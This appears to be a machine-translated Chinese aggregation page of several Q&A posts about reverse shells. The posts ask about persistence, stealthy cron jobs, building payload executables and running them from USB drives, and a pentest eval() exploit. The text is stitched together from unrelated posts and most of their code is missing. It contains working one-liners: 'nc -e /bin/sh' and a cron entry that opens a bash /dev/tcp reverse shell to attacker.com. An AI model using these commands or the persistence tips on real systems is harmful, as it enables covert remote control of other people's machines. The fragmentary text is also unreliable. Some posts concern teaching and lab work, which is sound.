问题标签 [reverse-shell]

我需要一些关于 C 程序的帮助 - 它是一个反向 shell（https://github.com/arturgontijo/remoteShell/blob/master/reverseShell.c） + 提出一些参数来直接传递 IP 和 PORT，因为它工作得非常好它很稳定（不能用 TAB 自动完成内容的问题我并不在乎）但我真正关心的是，如果我在目标机器上按下，这东西会坏掉CTRL+C程序只是自行退出。现在我用这个例子来阻止CTRL+C调用：

我在网上找到了这个例子并将它放在我的循环中，但仍然来自客户端按下ctrl+C中断程序。我想知道dup2()是负责那个还是什么，因为在简单的 C 程序上这实际上工作得很好。

以下是我的 reverse_shell python 代码

我使用 netcat 作为侦听器。问题是当我使用 python 3.4 shell 命令运行上面的代码时卡住并且我没有得到输出但是如果我使用 python 2 它工作正常。

我在 Windows 上玩这个，netcat 在第二个设备上监听：

^{来源：https ://www.trustedsec.com/files/RevShell_PoC_v1.py}

有没有办法产生一个完全交互式的cmd.exe外壳？我什至无法在time没有锁定的情况下运行该命令，因为它需要输入。任何需要输入的命令只会导致它停止直到^C.

最好有小提示（即C:\>），tab完成，↑</kbd> history, like a proper tty. I've found a few techniques suitable for /bin/sh and /bin/bash on Unix & Linux but nothing so far for Windows cmd.exe.

好的，所以我正在为我的计算机开发一个反向外壳，所以如果发生任何事情，我可以回去修复它。我在 PC 上使用了该命令nc -nvlp 1234，而在另一台上，我nc -e /bin/sh <ip> 1234使用它运行，我可以连接到计算机并远程使用 shell。出于某种原因，除非主机关闭连接，否则我看不到 shell 的回复。我怎样才能让这个节目从 shell 现场回复。前任

除非主机在我仍然连接时关闭连接，否则 shell 不会显示它，而不是这样做。

我正在制作一个程序来生成一个在运行时运行反向 shell 的可执行文件，但我需要这个程序从用户那里获取输入（xxx = 端口，xxx.xxx.xx = IP 地址）并使用所述数据创建一个可执行文件。我想使用 pyinstaller，但我需要有关如何使用的建议

我在一所大学教网络安全，正在编写一个关于 Netcat 和反向 shell 的实验室。我创建了一个运行连接到我的侦听器的脚本的 cron 作业。这很好用。问题是指纹太多，脚本可以被删除。实验室的一部分是关于隐身操作（比如在输入的任何命令前放置一个空格）。

我正在尝试执行此命令。现在频率并不重要，但最终它会在启动时每 30 分钟运行一次。

从命令行运行时，该命令起作用并建立了反向 shell。我不想使用端口 80，因为如果学生决定尝试一些愚蠢的事情，我确实希望它被阻止。下一个实验室也在 iptables 上阻止这个端口。

我试过引号。我试过sudo。末尾的双 & 号。末尾有一个 & 符号。/tcp/ 路径的进一步限定。我认为我不需要确定它是从哪个 tty 会话运行的（那会很困难）。在任何情况下 cron-run 命令都不会成功。

这是系统日志

它似乎没有失败......它只是不工作。

所以对于许多比我聪明的人来说，我做错了什么以及如何让这个命令作为一个 cron 作业工作（调用脚本不是一个选项）？

更新：解决方案是* * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/5326 0>&1'虽然我仍在努力解决两个错误。

我正在尝试将下面的经典 python 反向 shell 转换为可以在机器上运行并随时连接回的持久 shell。

我让它几乎按预期工作，但是当 shell 捕获时，python 进程停止。我认为这是由于 python 子进程模块的行为，但我不确定。

我尝试过交换subprocess.Popenand subprocess.call，并尝试过使用continueandpass关键字。我的代码如下。

这是在“目标”机器上运行脚本的输出。

这是监听机上的输出...

我本来希望目标机器上的所有输出，并且脚本继续运行，shell 在后台生成，并且仅在另一台机器正在侦听时才捕获。我希望这个脚本在后台运行时能够完美运行。为什么这不起作用？

我今天试图尽可能多地理解一个命令（在此处找到）在受害者端打开一个反向 shell。就这个：

但是，我没有完全明白为什么第一个重定向是>&. 我知道这/dev/tcp/ip/port是由 bash 创建的“伪”文件，但是如果必须将其视为真实文件或文件描述符，我没有找到信息。因此，我尝试将其视为真实文件，并像这样重写 bash 命令：

在这种情况下，会发生一种奇怪的行为：反向 shell 正在按预期工作（我可以在攻击者端键入一些命令，也可以在攻击者端获取输出），除了一个输出：bash 命令提示符文本。所以唯一没有打印在攻击者端而是在受害者端的是：

其他所有内容都按预期打印，即在攻击者方面。

我尝试的最后一个测试是像这样更改 bash 命令：

事实上，在阅读了 bash 的手册页之后，使用重定向对我来说更有意义<，正如手册页中所述，这会打开文件描述符1以读取文件描述符0。在这里，出现了与第二个命令相同的问题（除了 bash 命令提示符之外的所有内容都打印在攻击者身上bash-4.4$）。

我还注意到重定向 stderr 如下：

解决了问题，好像bash-4.4$打印在stderr上...

因此，我有四个问题找不到答案：

1. 应该/dev/tcp并且/dev/udp被视为文件还是直接作为文件描述符？这相当于问：我们应该写echo "hello" >/dev/tcp/ip/port还是echo "hello" >&/dev/tcp/ip/port？
2. 为什么作者习惯于0>&1更改 stdin 而不是<&1，它怎么可能在命令的第一个版本中工作？
3. 为什么第二个和第三个命令会发生这种奇怪的行为？怎么可能只有部分输出被重定向？在我看来，它应该重定向所有内容或什么都不重定向。
4. 为什么在最后一个命令中重定向 stderr 可以解决问题？这不是在第一个命令（作者的原始命令）上完成的，但它仍然有效..

非常感谢您的回答！我希望我尽可能清楚地说明这篇文章。

大家早上好，我在这个网站 ( https://github.com/AyyoubOuakkaha/Younioner ) 遇到了反向 shell 的问题。当我运行服务器和客户端时，代码有效，但问题是当我运行 setup.py 时，我在下面收到此错误

UserWarning：未知分发选项：'console'warnings.warn(msg) 用法：setup.py [global_opts] cmd1 [cmd1_opts] [cmd2 [cmd2_opts] ...]或：setup.py --help [cmd1 cmd2 ... ]or: setup.py --help-commandsor:setup.py cmd --helperror: no commands provided`。有没有办法解决这个问题并将脚本放在 USB 驱动器上并在其他电脑上运行。

如果有办法解决这个问题，你可以在 USB 驱动器上执行并在其他电脑上运行脚本吗？

我正在一个渗透测试实验室工作。我需要利用一个 Python eval() 函数。

它像是

我需要执行一个 Python 反向 shell 脚本作为有效负载。这是

我正在尝试

不知道如何导入所有这些模块并执行它。

任何帮助表示赞赏。